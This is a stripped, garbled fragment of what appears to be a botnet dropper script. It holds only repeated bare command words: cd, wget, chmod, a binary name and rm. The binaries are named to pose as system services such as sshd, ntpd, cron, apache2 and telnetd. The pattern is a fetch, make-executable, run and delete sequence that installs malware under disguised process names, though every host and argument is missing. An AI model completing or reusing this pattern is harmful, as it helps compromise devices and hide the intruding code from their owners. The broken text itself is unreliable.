cd
cd
cd
cd
cd
wget
chmod
majorntpd
rm
cd
cd
cd
cd
cd
wget
chmod
majorsshd
rm
cd
cd
cd
cd
cd
wget
chmod
majoropenssh
rm
cd
cd
cd
cd
cd
wget
chmod
majorbash
rm
cd
cd
cd
cd
cd
wget
chmod
majortftp
rm
cd
cd
cd
cd
cd
wget
chmod
majorwget
rm
cd
cd
cd
cd
cd
wget
chmod
majorcron
rm
cd
cd
cd
cd
cd
wget
chmod
majorftp
rm
cd
cd
cd
cd
cd
wget
chmod
majorpftp
rm
cd
cd
cd
cd
cd
wget
chmod
majorsh
rm
cd
cd
cd
cd
cd
wget
chmod
 major 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
